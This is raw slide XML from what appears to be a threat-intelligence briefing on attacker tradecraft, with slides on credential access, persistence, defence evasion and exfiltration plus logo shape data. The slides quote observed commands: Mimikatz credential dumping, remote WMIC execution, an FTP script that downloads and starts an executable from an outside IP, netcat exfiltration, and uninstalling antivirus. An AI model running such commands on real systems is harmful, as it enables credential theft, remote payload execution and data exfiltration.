                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Mimikatz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> -Command '"log" "token::elevate" "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>lsadump</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>::</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>"'</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="18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923" y="94877"/>
            <a:ext cx="6895176" cy="669029"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Nuggets – Credential Access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288" y="991039"/>
            <a:ext cx="7514751" cy="3776224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Wmic  /NODE:"[REDACTED]" /USER:"[REDACTED]" /password:[REDACTED] process call create "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>cmd.exe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> /c (c:\windows\security\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>mnl.exe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pr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>::dg </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>::</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>lp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t> et -p </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&gt;c:\windows\security\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>file.txt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>) &gt;&gt; c:\windows\temp\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>temp.txt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>m.exe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> powerful -d </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sekurlsa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logonpasswords</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> &gt; c:\windows\temp\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>file.txt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c:\windows\temp\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>MicrosoftUpdate.exe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> p::d s::l q &gt; c:\windows\temp\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>mic.txt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923" y="94877"/>
            <a:ext cx="6895176" cy="669029"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>nuggets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288" y="991039"/>
            <a:ext cx="7514751" cy="3776224"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Windows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Use of SolarWinds Remote Management Tool, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>winagentrcl.exe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Use of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>AppInit_DLLs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> for persistence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Use of “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>msiexec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> /x” to uninstall products (AV) – Defense Evasion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Use of ‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>chcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>’ (1251, 850) to change </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>cmd.exe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> code page</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Linux</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Enumerating Ruby </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>after_cd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hooks - Persistence</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3075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923" y="94877"/>
            <a:ext cx="6895176" cy="669029"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Nuggets - Exfiltration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288" y="991039"/>
            <a:ext cx="7514751" cy="3776224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Windows Command Line</a:t>
            </a:r>
          </a:p>
          <a:p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cmd.exe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 /c "@echo open AA.BB.CC[.]DD&gt;&gt;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ftpget.txt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&amp;@echo </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="Karla" pitchFamily="2" charset="0"/>
                <a:ea typeface="Karla" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>&lt;name&gt;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&gt;&gt;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ftpget.txt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&amp;@echo </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="Karla" pitchFamily="2" charset="0"/>
                <a:ea typeface="Karla" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>hehehe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&gt;&gt;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ftpget.txt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&amp;@echo binary&gt;&gt;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ftpget.txt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&amp;@echo get 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f.exe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&gt;&gt;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ftpget.txt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&amp;@echo quit&gt;&gt;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ftpget.txt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&amp;@ftp -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s:ftpget.txt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&amp;@start </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="18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f.exe</a:t>
            </a:r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”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Karla" pitchFamily="2" charset="0"/>
              <a:ea typeface="Karla" pitchFamily="2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Linux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Use of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>netcat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> (data exfil); i.e., “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>nc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> –</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>nv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> &lt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>some_file.zip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill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923" y="94877"/>
            <a:ext cx="6895176" cy="669029"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Nuggets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288" y="991039"/>
            <a:ext cx="7514751" cy="3776224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Time-to-Use</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>11 Feb – Jenkins vulnerability disclosed</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>12 Feb – observed actor attempting to download Metasploit module targeting Jenkins (just over 24 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>hrs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4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4731" y="1324044"/>
            <a:ext cx="2636801" cy="114667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" y="0"/>
            <a:ext cx="9144000" cy="51435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798746" y="3908564"/>
            <a:ext cx="1546511" cy="709470"/>
            <a:chOff x="4601369" y="4130314"/>
            <a:chExt cx="2986086" cy="1369883"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="19" name="Group 18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4601369" y="5226969"/>
              <a:ext cx="2986086" cy="273228"/>
              <a:chOff x="-3676651" y="-3749675"/>
              <a:chExt cx="21201064" cy="1939925"/>
            </a:xfrm>
          </p:grpSpPr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-3676651" y="-3733800"/>
                <a:ext cx="1636713" cy="1924050"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 54 w 96"/>
                  <a:gd name="T1" fmla="*/ 0 h 113"/>
                  <a:gd name="T2" fmla="*/ 93 w 96"/>
                  <a:gd name="T3" fmla="*/ 14 h 113"/>
                  <a:gd name="T4" fmla="*/ 89 w 96"/>
                  <a:gd name="T5" fmla="*/ 19 h 113"/>
                  <a:gd name="T6" fmla="*/ 54 w 96"/>
                  <a:gd name="T7" fmla="*/ 6 h 113"/>
                  <a:gd name="T8" fmla="*/ 7 w 96"/>
                  <a:gd name="T9" fmla="*/ 56 h 113"/>
                  <a:gd name="T10" fmla="*/ 55 w 96"/>
                  <a:gd name="T11" fmla="*/ 106 h 113"/>
                  <a:gd name="T12" fmla="*/ 92 w 96"/>
                  <a:gd name="T13" fmla="*/ 92 h 113"/>
                  <a:gd name="T14" fmla="*/ 96 w 96"/>
                  <a:gd name="T15" fmla="*/ 96 h 113"/>
                  <a:gd name="T16" fmla="*/ 55 w 96"/>
                  <a:gd name="T17" fmla="*/ 113 h 113"/>
                  <a:gd name="T18" fmla="*/ 0 w 96"/>
                  <a:gd name="T19" fmla="*/ 56 h 113"/>
                  <a:gd name="T20" fmla="*/ 54 w 96"/>
                  <a:gd name="T2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13">
                    <a:moveTo>
                      <a:pt x="54" y="0"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="80" y="0"/>
                      <a:pt x="93" y="14"/>
                      <a:pt x="93" y="14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6" y="6"/>
                      <a:pt x="54" y="6"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="28" y="6"/>
                      <a:pt x="7" y="27"/>
                      <a:pt x="7" y="56"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="7" y="84"/>
                      <a:pt x="27" y="106"/>
                      <a:pt x="55" y="106"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="78" y="106"/>
                      <a:pt x="92" y="92"/>
                      <a:pt x="92" y="92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6" y="96"/>
                      <a:pt x="81" y="113"/>
                      <a:pt x="55" y="113"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="23" y="113"/>
                      <a:pt x="0" y="87"/>
                      <a:pt x="0" y="56"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="24"/>
                      <a:pt x="24" y="0"/>
                      <a:pt x="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7"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="-1339850" y="-3698875"/>
                <a:ext cx="1227138" cy="1855787"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 72"/>
                  <a:gd name="T1" fmla="*/ 0 h 109"/>
                  <a:gd name="T2" fmla="*/ 32 w 72"/>
                  <a:gd name="T3" fmla="*/ 0 h 109"/>
                  <a:gd name="T4" fmla="*/ 52 w 72"/>
                  <a:gd name="T5" fmla="*/ 3 h 109"/>
                  <a:gd name="T6" fmla="*/ 67 w 72"/>
                  <a:gd name="T7" fmla="*/ 29 h 109"/>
                  <a:gd name="T8" fmla="*/ 45 w 72"/>
                  <a:gd name="T9" fmla="*/ 59 h 109"/>
                  <a:gd name="T10" fmla="*/ 45 w 72"/>
                  <a:gd name="T11" fmla="*/ 60 h 109"/>
                  <a:gd name="T12" fmla="*/ 48 w 72"/>
                  <a:gd name="T13" fmla="*/ 64 h 109"/>
                  <a:gd name="T14" fmla="*/ 72 w 72"/>
                  <a:gd name="T15" fmla="*/ 109 h 109"/>
                  <a:gd name="T16" fmla="*/ 64 w 72"/>
                  <a:gd name="T17" fmla="*/ 109 h 109"/>
                  <a:gd name="T18" fmla="*/ 38 w 72"/>
                  <a:gd name="T19" fmla="*/ 61 h 109"/>
                  <a:gd name="T20" fmla="*/ 7 w 72"/>
                  <a:gd name="T21" fmla="*/ 61 h 109"/>
                  <a:gd name="T22" fmla="*/ 7 w 72"/>
                  <a:gd name="T23" fmla="*/ 109 h 109"/>
                  <a:gd name="T24" fmla="*/ 0 w 72"/>
                  <a:gd name="T25" fmla="*/ 109 h 109"/>
                  <a:gd name="T26" fmla="*/ 0 w 72"/>
                  <a:gd name="T27" fmla="*/ 0 h 109"/>
                  <a:gd name="T28" fmla="*/ 36 w 72"/>
                  <a:gd name="T29" fmla="*/ 54 h 109"/>
                  <a:gd name="T30" fmla="*/ 60 w 72"/>
                  <a:gd name="T31" fmla="*/ 29 h 109"/>
                  <a:gd name="T32" fmla="*/ 47 w 72"/>
                  <a:gd name="T33" fmla="*/ 8 h 109"/>
                  <a:gd name="T34" fmla="*/ 32 w 72"/>
                  <a:gd name="T35" fmla="*/ 6 h 109"/>
                  <a:gd name="T36" fmla="*/ 7 w 72"/>
                  <a:gd name="T37" fmla="*/ 6 h 109"/>
                  <a:gd name="T38" fmla="*/ 7 w 72"/>
                  <a:gd name="T39" fmla="*/ 54 h 109"/>
                  <a:gd name="T40" fmla="*/ 36 w 72"/>
                  <a:gd name="T41" fmla="*/ 5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109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42" y="0"/>
                      <a:pt x="47" y="1"/>
                      <a:pt x="52" y="3"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="61" y="8"/>
                      <a:pt x="67" y="17"/>
                      <a:pt x="67" y="29"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="67" y="45"/>
                      <a:pt x="58" y="57"/>
                      <a:pt x="45" y="59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0"/>
                      <a:pt x="46" y="61"/>
                      <a:pt x="48" y="64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0" y="109"/>
                      <a:pt x="0" y="109"/>
                      <a:pt x="0" y="109"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="0" y="0"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="36" y="54"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="51" y="54"/>
                      <a:pt x="60" y="44"/>
                      <a:pt x="60" y="29"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="60" y="20"/>
                      <a:pt x="55" y="12"/>
                      <a:pt x="47" y="8"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="44" y="7"/>
                      <a:pt x="41" y="6"/>
                      <a:pt x="3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4"/>
                      <a:pt x="7" y="54"/>
                      <a:pt x="7" y="54"/>
                    </a:cubicBez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"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="450850" y="-3733800"/>
                <a:ext cx="1876425" cy="1924050"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 55 w 110"/>
                  <a:gd name="T1" fmla="*/ 0 h 113"/>
                  <a:gd name="T2" fmla="*/ 110 w 110"/>
                  <a:gd name="T3" fmla="*/ 56 h 113"/>
                  <a:gd name="T4" fmla="*/ 55 w 110"/>
                  <a:gd name="T5" fmla="*/ 113 h 113"/>
                  <a:gd name="T6" fmla="*/ 0 w 110"/>
                  <a:gd name="T7" fmla="*/ 56 h 113"/>
                  <a:gd name="T8" fmla="*/ 55 w 110"/>
                  <a:gd name="T9" fmla="*/ 0 h 113"/>
                  <a:gd name="T10" fmla="*/ 55 w 110"/>
                  <a:gd name="T11" fmla="*/ 106 h 113"/>
                  <a:gd name="T12" fmla="*/ 103 w 110"/>
                  <a:gd name="T13" fmla="*/ 56 h 113"/>
                  <a:gd name="T14" fmla="*/ 55 w 110"/>
                  <a:gd name="T15" fmla="*/ 6 h 113"/>
                  <a:gd name="T16" fmla="*/ 7 w 110"/>
                  <a:gd name="T17" fmla="*/ 56 h 113"/>
                  <a:gd name="T18" fmla="*/ 55 w 110"/>
                  <a:gd name="T19" fmla="*/ 10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113">
                    <a:moveTo>
                      <a:pt x="55" y="0"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="85" y="0"/>
                      <a:pt x="110" y="24"/>
                      <a:pt x="110" y="56"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="110" y="88"/>
                      <a:pt x="85" y="113"/>
                      <a:pt x="55" y="113"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="24" y="113"/>
                      <a:pt x="0" y="88"/>
                      <a:pt x="0" y="56"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="24"/>
                      <a:pt x="24" y="0"/>
                      <a:pt x="55" y="0"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="55" y="106"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="81" y="106"/>
                      <a:pt x="103" y="84"/>
                      <a:pt x="103" y="56"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="103" y="28"/>
                      <a:pt x="81" y="6"/>
                      <a:pt x="55" y="6"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="28" y="6"/>
                      <a:pt x="7" y="28"/>
                      <a:pt x="7" y="56"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="7" y="84"/>
                      <a:pt x="28" y="106"/>
                      <a:pt x="55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 userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2855912" y="-3698875"/>
                <a:ext cx="2217738" cy="1855787"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 64 w 130"/>
                  <a:gd name="T1" fmla="*/ 9 h 109"/>
                  <a:gd name="T2" fmla="*/ 60 w 130"/>
                  <a:gd name="T3" fmla="*/ 27 h 109"/>
                  <a:gd name="T4" fmla="*/ 37 w 130"/>
                  <a:gd name="T5" fmla="*/ 109 h 109"/>
                  <a:gd name="T6" fmla="*/ 28 w 130"/>
                  <a:gd name="T7" fmla="*/ 109 h 109"/>
                  <a:gd name="T8" fmla="*/ 0 w 130"/>
                  <a:gd name="T9" fmla="*/ 0 h 109"/>
                  <a:gd name="T10" fmla="*/ 7 w 130"/>
                  <a:gd name="T11" fmla="*/ 0 h 109"/>
                  <a:gd name="T12" fmla="*/ 30 w 130"/>
                  <a:gd name="T13" fmla="*/ 89 h 109"/>
                  <a:gd name="T14" fmla="*/ 32 w 130"/>
                  <a:gd name="T15" fmla="*/ 100 h 109"/>
                  <a:gd name="T16" fmla="*/ 33 w 130"/>
                  <a:gd name="T17" fmla="*/ 100 h 109"/>
                  <a:gd name="T18" fmla="*/ 36 w 130"/>
                  <a:gd name="T19" fmla="*/ 89 h 109"/>
                  <a:gd name="T20" fmla="*/ 61 w 130"/>
                  <a:gd name="T21" fmla="*/ 0 h 109"/>
                  <a:gd name="T22" fmla="*/ 68 w 130"/>
                  <a:gd name="T23" fmla="*/ 0 h 109"/>
                  <a:gd name="T24" fmla="*/ 93 w 130"/>
                  <a:gd name="T25" fmla="*/ 89 h 109"/>
                  <a:gd name="T26" fmla="*/ 96 w 130"/>
                  <a:gd name="T27" fmla="*/ 100 h 109"/>
                  <a:gd name="T28" fmla="*/ 96 w 130"/>
                  <a:gd name="T29" fmla="*/ 100 h 109"/>
                  <a:gd name="T30" fmla="*/ 99 w 130"/>
                  <a:gd name="T31" fmla="*/ 89 h 109"/>
                  <a:gd name="T32" fmla="*/ 123 w 130"/>
                  <a:gd name="T33" fmla="*/ 0 h 109"/>
                  <a:gd name="T34" fmla="*/ 130 w 130"/>
                  <a:gd name="T35" fmla="*/ 0 h 109"/>
                  <a:gd name="T36" fmla="*/ 100 w 130"/>
                  <a:gd name="T37" fmla="*/ 109 h 109"/>
                  <a:gd name="T38" fmla="*/ 92 w 130"/>
                  <a:gd name="T39" fmla="*/ 109 h 109"/>
                  <a:gd name="T40" fmla="*/ 69 w 130"/>
                  <a:gd name="T41" fmla="*/ 27 h 109"/>
                  <a:gd name="T42" fmla="*/ 65 w 130"/>
                  <a:gd name="T43" fmla="*/ 9 h 109"/>
                  <a:gd name="T44" fmla="*/ 64 w 130"/>
                  <a:gd name="T45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109">
                    <a:moveTo>
                      <a:pt x="64" y="9"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="64" y="9"/>
                      <a:pt x="62" y="20"/>
                      <a:pt x="60" y="27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94"/>
                      <a:pt x="32" y="100"/>
                      <a:pt x="32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0"/>
                      <a:pt x="34" y="94"/>
                      <a:pt x="36" y="89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5" y="94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8" y="94"/>
                      <a:pt x="99" y="89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7" y="20"/>
                      <a:pt x="65" y="9"/>
                      <a:pt x="65" y="9"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="64" y="9"/>
                      <a:pt x="64" y="9"/>
                      <a:pt x="6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 userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5721350" y="-3698875"/>
                <a:ext cx="1517650" cy="1855787"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 89"/>
                  <a:gd name="T1" fmla="*/ 0 h 109"/>
                  <a:gd name="T2" fmla="*/ 35 w 89"/>
                  <a:gd name="T3" fmla="*/ 0 h 109"/>
                  <a:gd name="T4" fmla="*/ 89 w 89"/>
                  <a:gd name="T5" fmla="*/ 54 h 109"/>
                  <a:gd name="T6" fmla="*/ 35 w 89"/>
                  <a:gd name="T7" fmla="*/ 109 h 109"/>
                  <a:gd name="T8" fmla="*/ 0 w 89"/>
                  <a:gd name="T9" fmla="*/ 109 h 109"/>
                  <a:gd name="T10" fmla="*/ 0 w 89"/>
